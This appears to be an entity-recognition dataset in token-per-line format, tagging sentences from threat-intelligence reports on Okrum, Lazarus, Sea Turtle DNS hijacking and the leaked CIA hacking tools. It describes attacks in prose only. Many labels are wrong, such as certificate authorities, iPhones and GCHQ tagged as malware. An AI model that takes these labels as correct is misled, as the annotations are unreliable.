+group O
+are O
+for O
+vulnerabilities O
+in O
+Internet B-MAL
+Explorer E-MAL
+and O
+Flash S-MAL
+. O
+According O
+to O
+reports O
+, O
+the O
+Philippines S-LOC
+is O
+the O
+most O
+exposed O
+country O
+in O
+ASEAN O
+to O
+the O
+cyberattacks S-APT
+known O
+as O
+advanced O
+persistent O
+threats O
+, O
+or O
+APTs O
+. O
+Our O
+analysis O
+of O
+this O
+malware O
+shows O
+that O
+it O
+belongs O
+to O
+Hussarini S-FILE
+, O
+also O
+known O
+as O
+Sarhust O
+, O
+a O
+backdoor O
+family O
+that O
+has O
+been O
+used O
+actively O
+in O
+APT O
+attacks O
+targeting O
+countries O
+in O
+the O
+ASEAN B-LOC
+region E-LOC
+since O
+2014 S-TIME
+. O
+OutExtra.exe S-FILE
+is O
+a O
+signed O
+legitimate O
+application O
+from O
+Microsoft S-IDTY
+named O
+finder.exe S-FILE
+. O
+In O
+addition O
+to O
+file-based O
+protection O
+, O
+customers O
+of O
+the O
+DeepSight S-SECTEAM
+Intelligence O
+Managed O
+Adversary O
+and O
+Threat O
+Intelligence O
+(MATI) O
+service O
+have O
+received O
+reports O
+on O
+Buckeye S-APT
+, O
+which O
+detail O
+methods O
+of O
+detecting O
+and O
+thwarting O
+activities O
+of O
+this O
+group O
+. O
+However O
+, O
+in O
+this O
+attack S-APT
+, O
+this O
+file O
+is O
+used O
+to O
+load O
+the O
+Hussarini O
+backdoor O
+via O
+DLL S-MAL
+hijacking S-MAL
+. O
+Today O
+, O
+this O
+malware S-FILE
+is O
+still O
+actively O
+being O
+used O
+against O
+the O
+Philippines S-LOC
+. O
+Hussarini O
+was O
+first O
+mentioned O
+in O
+APT O
+campaigns O
+targeting O
+the O
+Philippines S-LOC
+and O
+Thailand O
+in O
+2014 O
+. O
+Further O
+analysis O
+showed O
+that O
+the O
+Iron S-APT
+cybercrime O
+group O
+used O
+two O
+main O
+functions O
+from O
+HackingTeam's O
+source O
+in O
+both O
+IronStealer S-MAL
+and O
+Iron B-MAL
+ransomware E-MAL
+. O
+Xagent” S-FILE
+is O
+the O
+original O
+filename O
+Xagent.exe S-FILE
+whereas O
+seems O
+to O
+be O
+the O
+version O
+of O
+the O
+worm S-FILE
+. O
+Xagent S-APT
+– O
+A O
+variant O
+of O
+JbossMiner B-APT
+Mining E-APT
+Worm” O
+– O
+a O
+worm O
+written O
+in O
+Python S-TOOL
+and O
+compiled O
+using O
+PyInstaller O
+for O
+both O
+Windows S-OS
+and O
+Linux S-OS
+platforms O
+. O
+Its O
+activities O
+were O
+traced O
+back O
+to O
+2010 S-TIME
+in O
+FireEye's S-SECTEAM
+2013 O
+report O
+on O
+operation O
+Ke3chang S-APT
+– O
+a O
+cyberespionage O
+campaign O
+directed O
+at O
+diplomatic O
+organizations O
+in O
+Europe S-LOC
+. O
+We O
+have O
+been O
+tracking O
+the O
+malicious O
+activities O
+related O
+to O
+this O
+threat O
+actor O
+and O
+discovered O
+a O
+previously O
+undocumented O
+malware O
+family O
+with O
+strong O
+links O
+to O
+the O
+Ke3chang S-APT
+group O
+– O
+a O
+backdoor S-MAL
+we O
+named O
+Okrum S-MAL
+. O
+Furthermore O
+, O
+from O
+2015 O
+to O
+2019 O
+, O
+we O
+detected O
+new O
+versions O
+of O
+known O
+malware O
+families O
+attributed O
+to O
+the O
+Ke3chang S-APT
+group O
+– O
+BS2005 B-MAL
+backdoors E-MAL
+from O
+operation O
+Ke3chang O
+and O
+the O
+RoyalDNS S-MAL
+malware S-MAL
+, O
+reported O
+by O
+NCC S-SECTEAM
+Group O
+in O
+2018 S-TIME
+. O
+Ke3chang S-APT
+behind O
+the O
+attacks O
+seemed O
+to O
+have O
+a O
+particular O
+interest O
+in O
+Slovakia S-LOC
+, O
+where O
+a O
+big O
+portion O
+of O
+the O
+discovered O
+malware O
+samples O
+was O
+detected; O
+Croatia S-LOC
+, O
+the O
+Czech B-LOC
+Republic E-LOC
+and O
+other O
+countries O
+were O
+also O
+affected O
+. O
+Our O
+technical O
+analysis O
+of O
+the O
+malware S-FILE
+used O
+in O
+these O
+attacks O
+showed O
+close O
+ties O
+to O
+BS2005 B-FILE
+backdoors E-FILE
+from O
+operation O
+Ke3chang O
+, O
+and O
+to O
+a O
+related O
+TidePool B-FILE
+malware E-FILE
+family O
+discovered O
+by O
+Palo B-SECTEAM
+Alto E-SECTEAM
+Networks O
+in O
+2016 S-TIME
+that O
+targeted O
+Indian O
+embassies O
+across O
+the O
+globe O
+. O
+The O
+story O
+continued O
+in O
+late O
+2016 S-TIME
+, O
+when O
+we O
+discovered O
+a O
+new O
+, O
+previously O
+unknown O
+backdoor S-MAL
+that O
+we O
+named O
+Okrum S-MAL
+. O
+The O
+malicious O
+actors O
+behind O
+the O
+Okrum B-FILE
+malware E-FILE
+were O
+focused O
+on O
+the O
+same O
+targets O
+in O
+Slovakia S-LOC
+that O
+were O
+previously O
+targeted O
+by O
+Ketrican O
+2015 O
+backdoors S-FILE
+. O
+We O
+started O
+connecting O
+the O
+dots O
+when O
+we O
+discovered O
+that O
+the O
+Okrum B-FILE
+backdoor E-FILE
+was O
+used O
+to O
+drop O
+a O
+Ketrican B-FILE
+backdoor E-FILE
+, O
+freshly O
+compiled O
+in O
+2017 O
+. O
+In O
+2017 O
+, O
+the O
+same O
+entities O
+that O
+were O
+affected O
+by O
+the O
+Okrum B-FILE
+malware E-FILE
+and O
+by O
+the O
+2015 O
+Ketrican B-FILE
+backdoors E-FILE
+again O
+became O
+targets O
+of O
+the O
+malicious O
+actors O
+. O
+This O
+time O
+, O
+the O
+attackers O
+used O
+new O
+versions O
+of O
+the O
+RoyalDNS B-FILE
+malware E-FILE
+and O
+a O
+Ketrican S-FILE
+2017 O
+backdoor O
+. O
+According O
+to O
+ESET S-SECTEAM
+telemetry O
+, O
+Okrum S-FILE
+was O
+first O
+detected O
+in O
+December B-TIME
+2016 E-TIME
+, O
+and O
+targeted O
+diplomatic O
+missions O
+in O
+Slovakia S-LOC
+, O
+Belgium S-LOC
+, O
+Chile S-LOC
+, O
+Guatemala S-LOC
+and O
+Brazil S-LOC
+throughout O
+2017 O
+. O
+In O
+addition O
+to O
+file-based O
+protection O
+, O
+customers O
+of O
+the O
+DeepSight S-SECTEAM
+has O
+received O
+reports O
+on O
+Buckeye S-APT
+, O
+which O
+detail O
+methods O
+of O
+detecting O
+and O
+thwarting O
+activities O
+of O
+this O
+group O
+. O
+In O
+2018 S-TIME
+, O
+we O
+discovered O
+a O
+new O
+version O
+of O
+the O
+Ketrican O
+backdoor O
+that O
+featured O
+some O
+code O
+improvements O
+. O
+According O
+to O
+our O
+telemetry O
+, O
+Okrum S-FILE
+was O
+used O
+to O
+target O
+diplomatic O
+missions O
+in O
+Slovakia S-LOC
+, O
+Belgium S-LOC
+, O
+Chile S-LOC
+, O
+Guatemala S-LOC
+, O
+and O
+Brazil S-LOC
+, O
+with O
+the O
+attackers O
+showing O
+a O
+particular O
+interest O
+in O
+Slovakia O
+. O
+Indeed O
+, O
+we O
+have O
+detected O
+various O
+external O
+tools O
+being O
+abused O
+by O
+Okrum S-APT
+, O
+such O
+as O
+a O
+keylogger S-MAL
+, O
+tools S-MAL
+for O
+dumping O
+passwords O
+, O
+or O
+enumerating B-MAL
+network I-MAL
+sessions E-MAL
+. O
+The O
+detection O
+evasion O
+techniques O
+we O
+observed O
+in O
+the O
+Okrum S-FILE
+malware O
+include O
+embedding O
+the O
+malicious O
+payload O
+within O
+a O
+legitimate O
+PNG O
+image O
+, O
+employing O
+several O
+anti-emulation O
+and O
+anti-sandbox O
+tricks O
+, O
+as O
+well O
+as O
+making O
+frequent O
+changes O
+in O
+implementation O
+. O
+The O
+unnamed O
+company O
+makes O
+products O
+used O
+in O
+the O
+military O
+and O
+aerospace O
+industries O
+, O
+and O
+the O
+hackers O
+could O
+have O
+been O
+after O
+commercial O
+secrets O
+or O
+more O
+traditional O
+espionage O
+, O
+according O
+to O
+ClearSky S-SECTEAM
+, O
+the O
+cybersecurity O
+firm O
+that O
+exposed O
+the O
+operation S-ACT
+. O
+North O
+Korean O
+dictator O
+Kim O
+Jong O
+Un O
+has O
+set O
+ambitious O
+economic O
+goals O
+, O
+and O
+some O
+cybersecurity O
+analysts O
+have O
+predicted O
+he O
+will O
+unleash O
+the O
+Pyongyang-affiliated B-APT
+hackers E-APT
+to O
+meet O
+those O
+deadlines O
+by O
+targeting O
+multinational B-IDTY
+companies’ E-IDTY
+trade O
+secrets O
+. O
+According O
+to O
+ClearSky S-SECTEAM
+, O
+the O
+suspected O
+Lazarus O
+operatives O
+looked O
+to O
+leverage O
+a O
+vulnerability O
+in O
+outdated O
+WinRAR S-FILE
+file-archiving O
+software O
+that O
+hackers O
+have O
+been O
+exploiting O
+since O
+it O
+was O
+disclosed O
+last O
+month O
+. O
+This O
+new O
+Lotus B-APT
+Blossom E-APT
+campaign O
+delivers O
+a O
+malicious B-ACT
+RTF E-ACT
+document O
+posing O
+as O
+an O
+ASEAN S-LOC
+Defence O
+Minister's O
+Meeting O
+(ADMM) O
+directory O
+(decoy) O
+that O
+also O
+carries O
+an O
+executable O
+(payload) O
+embedded O
+as O
+an O
+OLE O
+object O
+, O
+the O
+Elise O
+backdoor O
+. O
+Just O
+months O
+after O
+the O
+APT32 S-APT
+watering B-ACT
+hole I-ACT
+activity E-ACT
+against O
+ASEAN-related O
+websites O
+was O
+observed O
+in O
+Fall O
+2017 O
+, O
+this O
+new O
+activity O
+clearly O
+indicates O
+the O
+association O
+(ASEAN) O
+clearly O
+remains O
+a O
+priority O
+collection O
+target O
+in O
+the O
+region O
+. O
+Researchers S-SECTEAM
+implicated O
+Lazarus S-APT
+Group O
+because O
+of O
+digital O
+clues O
+including O
+a O
+malicious B-MAL
+implant E-MAL
+known O
+as O
+Rising B-APT
+Sun E-APT
+that O
+has O
+been O
+attributed O
+to O
+the O
+group O
+. O
+The O
+attackers S-APT
+originally O
+embedded S-ACT
+an O
+implant O
+into O
+the O
+malicious O
+document O
+as O
+a O
+hypertext O
+application O
+(HTA) O
+file O
+, O
+and O
+then O
+quickly O
+moved O
+to O
+hide O
+it O
+in O
+an O
+image O
+on O
+a O
+remote O
+server O
+and O
+used O
+obfuscated O
+Visual B-TOOL
+Basic E-TOOL
+macros O
+to O
+launch O
+the O
+decoder O
+script O
+. O
+Lazarus S-APT
+used O
+the O
+open-source O
+tool O
+Invoke-PSImage S-MAL
+, O
+released O
+December O
+20 O
+, O
+to O
+embed O
+the O
+PowerShell S-TOOL
+script O
+into O
+the O
+image O
+file O
+. O
+Once O
+the O
+script O
+runs O
+, O
+it S-APT
+passes O
+the O
+decoded O
+script O
+from O
+the O
+image O
+file O
+to O
+the O
+Windows S-OS
+command O
+line O
+in O
+a O
+variable O
+$x O
+, O
+which O
+uses O
+cmd.exe S-FILE
+to O
+execute O
+the O
+obfuscated O
+script O
+and O
+run O
+it O
+via O
+PowerShell S-MAL
+. O
+The O
+Department O
+of O
+Homeland O
+Security O
+(DHS) S-SECTEAM
+issued O
+an O
+alert O
+about O
+this O
+activity O
+on O
+Jan. B-TIME
+24 I-TIME
+2019 E-TIME
+, O
+warning O
+that O
+an O
+attacker O
+could O
+redirect O
+user O
+traffic O
+and O
+obtain O
+valid O
+encryption O
+certificates O
+for O
+an O
+organization's O
+domain O
+names O
+. O
+In O
+the O
+Sea B-ACT
+Turtle E-ACT
+campaign O
+, O
+Talos S-SECTEAM
+was O
+able O
+to O
+identify O
+two O
+distinct O
+groups O
+of O
+victims O
+. O
+The O
+first O
+group O
+, O
+we O
+identify O
+as O
+primary O
+victims O
+, O
+includes O
+national B-IDTY
+security I-IDTY
+organizations E-IDTY
+, O
+ministries S-IDTY
+of O
+foreign O
+affairs O
+, O
+and O
+prominent B-IDTY
+energy I-IDTY
+organizations E-IDTY
+. O
+The O
+threat O
+actors S-APT
+behind O
+the O
+Sea B-ACT
+Turtle E-ACT
+campaign O
+show O
+clear O
+signs O
+of O
+being O
+highly O
+capable O
+and O
+brazen O
+in O
+their O
+endeavors O
+. O
+In O
+most O
+cases O
+, O
+threat O
+actors S-APT
+typically O
+stop O
+or O
+slow B-ACT
+down I-ACT
+their I-ACT
+activities E-ACT
+once O
+their O
+campaigns O
+are O
+publicly O
+revealed O
+. O
+The O
+threat O
+actors S-APT
+behind O
+the O
+Sea B-ACT
+Turtle E-ACT
+campaign O
+were O
+successful O
+in O
+compromising O
+entities O
+by O
+manipulating O
+and O
+falsifying O
+DNS S-PROT
+records O
+at O
+various O
+levels O
+in O
+the O
+domain O
+name O
+space O
+. O
+If O
+an O
+attacker S-APT
+was O
+able O
+to O
+compromise O
+an O
+organization's O
+network O
+administrator O
+credentials O
+, O
+the O
+attacker O
+would O
+be O
+able O
+to O
+change O
+that O
+particular O
+organization's O
+DNS S-PROT
+records O
+at O
+will O
+. O
+If O
+the O
+attackers S-APT
+were O
+able O
+to O
+obtain O
+one O
+of O
+these O
+EPP O
+keys O
+, O
+they O
+would O
+be O
+able O
+to O
+modify O
+any O
+DNS S-PROT
+records O
+that O
+were O
+managed O
+by O
+that O
+particular O
+registrar O
+. O
+Captured O
+legitimate O
+user O
+credentials O
+when O
+users O
+interacted O
+with O
+these O
+actor S-APT
+- O
+controlled S-ACT
+servers S-ACT
+. O
+The O
+diagram O
+below O
+illustrates O
+how O
+we O
+believe O
+the O
+actors O
+behind O
+the O
+Sea B-FILE
+Turtle E-FILE
+campaign O
+used O
+DNS S-PROT
+hijacking O
+to O
+achieve O
+their O
+end O
+goals O
+. O
+As O
+of O
+early B-TIME
+2019 E-TIME
+, O
+the O
+only O
+evidence O
+of O
+the O
+spear-phishing S-ACT
+threat B-APT
+vector E-APT
+came O
+from O
+a O
+compromised O
+organization's O
+public O
+disclosure O
+. O
+On O
+January O
+4 O
+, O
+Packet O
+Clearing O
+House O
+, O
+which O
+is O
+not O
+an O
+Internet O
+exchange O
+point O
+but O
+rather O
+is O
+an O
+NGO O
+which O
+provides O
+support O
+to O
+Internet O
+exchange O
+points O
+and O
+the O
+core O
+of O
+the O
+domain O
+name O
+system O
+, O
+provided O
+confirmation O
+of O
+this O
+aspect O
+of O
+the O
+actors’ S-APT
+tactics O
+when O
+it O
+publicly O
+revealed O
+its O
+internal O
+DNS S-PROT
+had O
+been O
+briefly O
+hijacked S-ACT
+as O
+a O
+consequence O
+of O
+the O
+compromise O
+at O
+its O
+domain O
+registrar O
+. O
+During O
+a O
+typical O
+incident O
+, O
+the O
+actor S-APT
+would O
+modify O
+the O
+NS O
+records O
+for O
+the O
+targeted O
+organization O
+, O
+pointing O
+users O
+to O
+a O
+malicious O
+DNS S-PROT
+server O
+that O
+provided O
+actor-controlled O
+responses O
+to O
+all O
+DNS S-PROT
+queries O
+. O
+The O
+next O
+step O
+for O
+the O
+actor S-APT
+was O
+to O
+build O
+MitM B-MAL
+servers E-MAL
+that O
+impersonated O
+legitimate O
+services O
+to O
+capture O
+user O
+credentials O
+. O
+In O
+addition O
+to O
+the O
+MitM B-MAL
+server E-MAL
+IP S-PROT
+addresses O
+published O
+in O
+previous O
+reports O
+, O
+Talos S-SECTEAM
+identified O
+16 O
+additional B-MAL
+servers E-MAL
+leveraged O
+by O
+the O
+actor S-APT
+during O
+the O
+observed O
+attacks O
+. O
+The O
+attackers S-APT
+would O
+then O
+use O
+the O
+certificate O
+on O
+actor-controlled O
+servers O
+to O
+perform O
+additional O
+MitM S-MAL
+operations O
+to O
+harvest O
+additional O
+credentials O
+. O
+In O
+some O
+cases O
+, O
+the O
+victims O
+were O
+redirected O
+to O
+these O
+actor-controlled S-APT
+servers S-MAL
+displaying O
+the O
+stolen O
+certificate O
+. O
+One O
+notable O
+aspect O
+of O
+the O
+campaign O
+was O
+the O
+actors' S-APT
+ability O
+to O
+impersonate O
+VPN B-MAL
+applications E-MAL
+, O
+such O
+as O
+Cisco O
+Adaptive B-MAL
+Security I-MAL
+Appliance E-MAL
+(ASA) O
+products O
+, O
+to O
+perform O
+MitM O
+attacks O
+. O
+At O
+this O
+time O
+, O
+we O
+do O
+not O
+believe O
+that O
+the O
+attackers S-APT
+found O
+a O
+new O
+ASA S-TOOL
+exploit S-VULNAME
+. O
+Rather O
+, O
+they S-APT
+likely O
+abused O
+the O
+trust O
+relationship O
+associated O
+with O
+the O
+ASA's S-MAL
+SSL O
+certificate O
+to O
+harvest O
+VPN S-TOOL
+credentials O
+to O
+gain O
+remote O
+access O
+to O
+the O
+victim's O
+network O
+. O
+As O
+an O
+example O
+, O
+DNS S-PROT
+records O
+indicate O
+that O
+a O
+targeted O
+domain O
+resolved O
+to O
+an O
+actor-controlled S-APT
+MitM B-MAL
+server E-MAL
+. O
+In O
+another O
+case O
+, O
+the O
+attackers S-APT
+were O
+able O
+to O
+compromise B-ACT
+NetNod E-ACT
+, O
+a O
+non-profit O
+, O
+independent O
+internet O
+infrastructure O
+organization O
+based O
+in O
+Sweden S-LOC
+. O
+Using O
+this O
+access O
+, O
+the O
+threat O
+actors S-APT
+were O
+able O
+to O
+manipulate S-ACT
+the O
+DNS S-PROT
+records O
+for O
+sa1[.]dnsnode[.]net O
+. O
+This O
+redirection O
+allowed O
+the O
+attackers S-APT
+to O
+harvest O
+credentials O
+of O
+administrators O
+who O
+manage O
+domains O
+with O
+the O
+TLD O
+of O
+Saudi B-LOC
+Arabia E-LOC
+(.sa) O
+. O
+In O
+one O
+of O
+the O
+more O
+recent O
+campaigns S-ACT
+on O
+March B-TIME
+27 E-TIME
+, O
+2019 O
+, O
+the O
+threat O
+actors S-APT
+targeted O
+the O
+Sweden-based O
+consulting O
+firm O
+Cafax S-IDTY
+. O
+We O
+assess O
+with O
+high O
+confidence O
+that O
+Sea B-ACT
+Turtle E-ACT
+was O
+targeted O
+in O
+an O
+attempt O
+to O
+re-establish O
+access O
+to O
+the O
+NetNod S-IDTY
+network O
+, O
+which O
+was O
+previously O
+compromised O
+by O
+this O
+threat O
+actor O
+. O
+Obtaining O
+access O
+to O
+this O
+ccTLD O
+registrars O
+would O
+have O
+allowed O
+attackers S-APT
+to O
+hijack O
+any O
+domain O
+that O
+used O
+those O
+ccTLDs O
+. O
+These O
+actors S-APT
+perform O
+DNS S-PROT
+hijacking O
+through O
+the O
+use O
+of O
+actor-controlled O
+name B-MAL
+servers E-MAL
+. O
+Sea B-APT
+Turtle E-APT
+have O
+been O
+more O
+aggressive O
+in O
+their O
+pursuit O
+targeting O
+DNS B-IDTY
+registries E-IDTY
+and O
+a O
+number B-IDTY
+of I-IDTY
+registrars E-IDTY
+, O
+including O
+those O
+that O
+manage O
+ccTLDs O
+. O
+These O
+actors S-APT
+use O
+Let's O
+Encrypts S-MAL
+, O
+Comodo S-MAL
+, O
+Sectigo S-MAL
+, O
+and O
+self-signed B-MAL
+certificates E-MAL
+in O
+their O
+MitM B-MAL
+servers E-MAL
+to O
+gain O
+the O
+initial O
+round O
+of O
+credentials O
+. O
+These O
+actors S-APT
+have O
+been O
+more O
+aggressive O
+in O
+their O
+pursuit O
+targeting O
+DNS S-PROT
+registries O
+and O
+a O
+number O
+of O
+registrars O
+, O
+including O
+those O
+that O
+manage S-IDTY
+ccTLDs S-IDTY
+. O
+Once O
+they O
+have O
+access B-ACT
+to I-ACT
+the I-ACT
+network E-ACT
+, O
+they S-APT
+steal O
+the O
+organization's O
+legitimate O
+SSL O
+certificate O
+and O
+use O
+it O
+on O
+actor-controlled S-MAL
+servers S-MAL
+. O
+we O
+believe O
+that O
+the O
+Sea B-ACT
+Turtle E-ACT
+campaign O
+continues O
+to O
+be O
+highly O
+successful O
+for O
+several O
+reasons O
+. O
+Had O
+more O
+ccTLDs S-ACT
+implemented O
+security O
+features O
+such O
+as O
+registrar O
+locks O
+, O
+attackers S-APT
+would O
+be O
+unable O
+to O
+redirect O
+the O
+targeted O
+domains O
+. O
+The O
+attackers S-APT
+stole O
+organizations' O
+SSL O
+certificates O
+associated O
+with O
+security O
+appliances O
+such O
+as O
+ASA S-MAL
+to O
+obtain O
+VPN S-TOOL
+credentials O
+, O
+allowing O
+the O
+actors O
+to O
+gain O
+access O
+to O
+the O
+targeted O
+network O
+. O
+The O
+threat O
+actors S-APT
+were O
+able O
+to O
+maintain S-ACT
+long O
+term O
+persistent O
+access O
+to O
+many O
+of O
+these O
+networks O
+by O
+utilizing B-ACT
+compromised I-ACT
+credentials E-ACT
+. O
+Cisco B-SECTEAM
+Talos E-SECTEAM
+will O
+continue O
+to O
+monitor O
+Sea B-ACT
+Turtle E-ACT
+and O
+work O
+with O
+our O
+partners O
+to O
+understand O
+the O
+threat O
+as O
+it O
+continues O
+to O
+evolve O
+to O
+ensure O
+that O
+our O
+customers O
+remain O
+protected O
+and O
+the O
+public O
+is O
+informed O
+. O
+If O
+the O
+user O
+enables O
+macro O
+to O
+open O
+the O
+xlsm B-MAL
+file E-MAL
+, O
+it S-FILE
+will O
+then O
+drop O
+the O
+legitimate O
+script O
+engine O
+AutoHotkey O
+along O
+with O
+a O
+malicious O
+script O
+file O
+. O
+Create O
+a O
+link B-FILE
+file E-FILE
+in O
+the O
+startup O
+folder O
+for O
+AutoHotkeyU32.exe S-FILE
+, O
+allowing O
+the O
+attack O
+to O
+persist O
+even O
+after O
+a O
+system O
+restart O
+. O
+More O
+importantly O
+, O
+one O
+of O
+these O
+files O
+also O
+enables O
+the O
+download S-ACT
+of O
+TeamViewer S-MAL
+, O
+a O
+remote O
+access O
+tool O
+that O
+gives O
+threat O
+actors S-APT
+remote O
+control O
+over O
+the O
+system O
+. O
+Such O
+attacks S-FILE
+highlight O
+the O
+need O
+for O
+caution O
+before O
+downloading B-ACT
+files E-ACT
+from O
+unknown O
+sources O
+and O
+enabling O
+macro O
+for O
+files O
+from O
+unknown O
+sources O
+. O
+The O
+agency's O
+hacking B-APT
+division E-APT
+freed O
+it O
+from O
+having O
+to O
+disclose O
+its O
+often O
+controversial O
+operations O
+to O
+the O
+NSA S-IDTY
+(its O
+primary O
+bureaucratic O
+rival) O
+in O
+order O
+to O
+draw O
+on O
+the O
+NSA's O
+hacking O
+capacities O
+. O
+By O
+the O
+end O
+of O
+2016 S-TIME
+, O
+the O
+CIA's B-APT
+hacking I-APT
+division E-APT
+, O
+which O
+formally O
+falls O
+under O
+the O
+agency's O
+Center O
+for O
+Cyber O
+Intelligence O
+(CCI) O
+, O
+had O
+over O
+5000 O
+registered O
+users O
+and O
+had O
+produced O
+more O
+than O
+a O
+thousand O
+hacking B-MAL
+systems E-MAL
+, O
+trojans S-MAL
+, O
+viruses S-MAL
+, O
+and O
+other O
+weaponized S-MAL
+malware S-MAL
+. O
+Such O
+is O
+the O
+scale O
+of O
+the O
+CIA's S-LOC
+undertaking O
+that O
+by O
+2016 S-TIME
+, O
+its O
+hackers O
+had O
+utilized O
+more O
+code O
+than O
+that O
+used O
+to O
+run O
+Facebook O
+. O
+Wikileaks S-SECTEAM
+has O
+carefully O
+reviewed O
+the O
+Year O
+Zero O
+disclosure O
+and O
+published O
+substantive O
+CIA S-APT
+documentation O
+while O
+avoiding O
+the O
+distribution O
+of O
+'armed' O
+cyberweapons O
+until O
+a O
+consensus O
+emerges O
+on O
+the O
+technical O
+and O
+political O
+nature O
+of O
+the O
+CIA's O
+program O
+and O
+how O
+such O
+'weapons' O
+should O
+analyzed O
+, O
+disarmed O
+and O
+published O
+. O
+These O
+redactions O
+include O
+ten O
+of O
+thousands O
+of O
+CIA S-APT
+targets O
+and O
+attack O
+machines O
+throughout O
+Latin B-LOC
+America E-LOC
+, O
+Europe S-LOC
+and O
+the B-LOC
+United I-LOC
+States E-LOC
+. O
+The O
+increasing O
+sophistication O
+of O
+surveillance O
+techniques O
+has O
+drawn O
+comparisons O
+with O
+George O
+Orwell's O
+1984 O
+, O
+but O
+Weeping B-MAL
+Angel E-MAL
+, O
+developed O
+by O
+the O
+CIA's S-APT
+Embedded O
+Devices O
+Branch O
+(EDB) O
+, O
+which O
+infests O
+smart B-MAL
+TVs E-MAL
+, O
+transforming O
+them O
+into O
+covert O
+microphones O
+, O
+is O
+surely O
+its O
+most O
+emblematic O
+realization O
+. O
+After O
+infestation O
+, O
+Weeping B-APT
+Angel E-APT
+places O
+the O
+target O
+TV O
+in O
+a O
+'Fake-Off' O
+mode O
+, O
+so O
+that O
+the O
+owner O
+falsely O
+believes O
+the O
+TV O
+is O
+off O
+when O
+it O
+is O
+on O
+. O
+As O
+of O
+October B-TIME
+2014 E-TIME
+the O
+CIA S-APT
+was O
+also O
+looking O
+at O
+infecting O
+the O
+vehicle O
+control O
+systems O
+used O
+by O
+modern O
+cars O
+and O
+trucks O
+. O
+The O
+CIA's S-APT
+Mobile O
+Devices O
+Branch O
+(MDB) O
+developed O
+numerous O
+attacks O
+to O
+remotely O
+hack O
+and O
+control O
+popular O
+smart O
+phones O
+. O
+Despite O
+iPhone's O
+minority O
+share O
+(14.5%) O
+of O
+the O
+global O
+smart O
+phone O
+market O
+in O
+2016 S-TIME
+, O
+a O
+specialized O
+unit O
+in O
+the O
+CIA's S-APT
+Mobile O
+Development O
+Branch O
+produces O
+malware O
+to O
+infest O
+, O
+control O
+and O
+exfiltrate O
+data O
+from O
+iPhones S-MAL
+and O
+other O
+Apple S-MAL
+products O
+running O
+iOS S-MAL
+, O
+such O
+as O
+iPads S-MAL
+. O
+The O
+attack O
+against O
+Samsung B-IDTY
+smart I-IDTY
+TVs E-IDTY
+was O
+developed O
+in O
+cooperation O
+with O
+the O
+United B-LOC
+Kingdom's E-LOC
+MI5/BTSS S-APT
+. O
+CIA's S-APT
+arsenal O
+includes O
+numerous O
+local O
+and O
+remote O
+zero B-ACT
+days E-ACT
+developed O
+by O
+CIA O
+or O
+obtained O
+from O
+GCHQ S-MAL
+, O
+NSA S-MAL
+, O
+FBI O
+or O
+purchased O
+from O
+cyber B-MAL
+arms I-MAL
+contractors E-MAL
+such O
+as O
+Baitshop O
+. O
+These O
+techniques O
+permit O
+the O
+CIA S-APT
+to O
+bypass O
+the O
+encryption O
+of O
+WhatsApp O
+, O
+Signal O
+, O
+Telegram O
+, O
+Wiebo O
+, O
+Confide O
+and O
+Cloackman O
+by O
+hacking O
+the O
+smart O
+phones O
+that O
+they O
+run O
+on O
+and O
+collecting O
+audio O
+and O
+message O
+traffic O
+before O
+encryption O
+is O
+applied O
+. O
+The O
+CIA S-APT
+also O
+runs O
+a O
+very O
+substantial O
+effort O
+to O
+infect O
+and O
+control O
+Microsoft S-IDTY
+Windows S-OS
+users O
+with O
+its O
+malware O
+. O
+CIA's S-APT
+malware O
+includes O
+multiple O
+local O
+and O
+remote O
+weaponized O
+zero B-ACT
+days E-ACT
+, O
+air O
+gap O
+jumping O
+viruses O
+such O
+as O
+Hammer B-MAL
+Drill E-MAL
+which O
+infects O
+software O
+distributed O
+on O
+CD/DVDs O
+, O
+infectors O
+for O
+removable O
+media O
+such O
+as O
+USBs O
+, O
+systems O
+to O
+hide O
+data O
+in O
+images O
+or O
+in O
+covert O
+disk O
+LOCs O
+Brutal B-MAL
+Kangaroo E-MAL
+and O
+to O
+keep O
+its O
+malware O
+infestations O
+going O
+. O
+Many O
+of O
+these O
+infection O
+efforts O
+are O
+pulled O
+together O
+by O
+the O
+CIA's S-APT
+Automated O
+Implant O
+Branch O
+(AIB) O
+, O
+which O
+has O
+developed O
+several O
+attack O
+systems O
+for O
+automated O
+infestation O
+and O
+control O
+of O
+CIA O
+malware O
+, O
+such O
+as O
+Assassin S-MAL
+and O
+Medusa S-MAL
+. O
+The O
+CIA S-APT
+has O
+developed O
+automated O
+multi-platform O
+malware O
+attack O
+and O
+control O
+systems O
+covering O
+Windows S-MAL
+, O
+Mac B-MAL
+OS I-MAL
+X E-MAL
+, O
+Solaris S-MAL
+, O
+Linux S-MAL
+and O
+more O
+, O
+such O
+as O
+EDB's O
+HIVE S-MAL
+and O
+the O
+related O
+Cutthroat S-MAL
+and O
+Swindle S-MAL
+tools O
+, O
+which O
+are O
+described O
+in O
+the O
+examples O
+section O
+below O
+. O
+By O
+hiding O
+these O
+security O
+flaws O
+from O
+manufacturers O
+like O
+Apple S-IDTY
+and O
+Google S-IDTY
+the O
+CIA S-APT
+ensures O
+that O
+it O
+can O
+hack O
+everyone O
+&mdsh; O
+at O
+the O
+expense O
+of O
+leaving O
+everyone O
+hackable O
+. O
+Once O
+in O
+Frankfurt S-LOC
+CIA S-APT
+hackers O
+can O
+travel O
+without O
+further O
+border O
+checks O
+to O
+the O
+25 O
+European B-LOC
+countries E-LOC
+that O
+are O
+part O
+of O
+the O
+Shengen O
+open O
+border O
+LOC O
+— O
+including O
+France S-LOC
+, O
+Italy S-LOC
+and O
+Switzerland S-LOC
+. O
+A O
+number O
+of O
+the O
+CIA's S-APT
+electronic O
+attack O
+methods O
+are O
+designed O
+for O
+physical B-ACT
+proximity E-ACT
+. O
+The O
+attacker S-APT
+is O
+provided O
+with O
+a O
+USB B-MAL
+containing I-MAL
+malware E-MAL
+developed O
+for O
+the O
+CIA O
+for O
+this O
+purpose O
+, O
+which O
+is O
+inserted O
+into O
+the O
+targeted O
+computer O
+. O
+The O
+attacker S-APT
+then O
+infects O
+and O
+exfiltrates O
+data O
+to O
+removable O
+media S-IDTY
+. O
+As O
+an O
+example O
+, O
+specific O
+CIA S-APT
+malware S-MAL
+revealed O
+in O
+Year O
+Zero O
+is O
+able O
+to O
+penetrate O
+, O
+infest O
+and O
+control O
+both O
+the O
+Android S-OS
+phone O
+and O
+iPhone O
+software O
+that O
+runs O
+or O
+has O
+run O
+presidential O
+Twitter O
+accounts O
+. O
+For O
+example O
+, O
+the O
+CIA O
+attack O
+system O
+Fine O
+Dining O
+, O
+provides O
+24 O
+decoy O
+applications O
+for O
+CIA O
+spies O
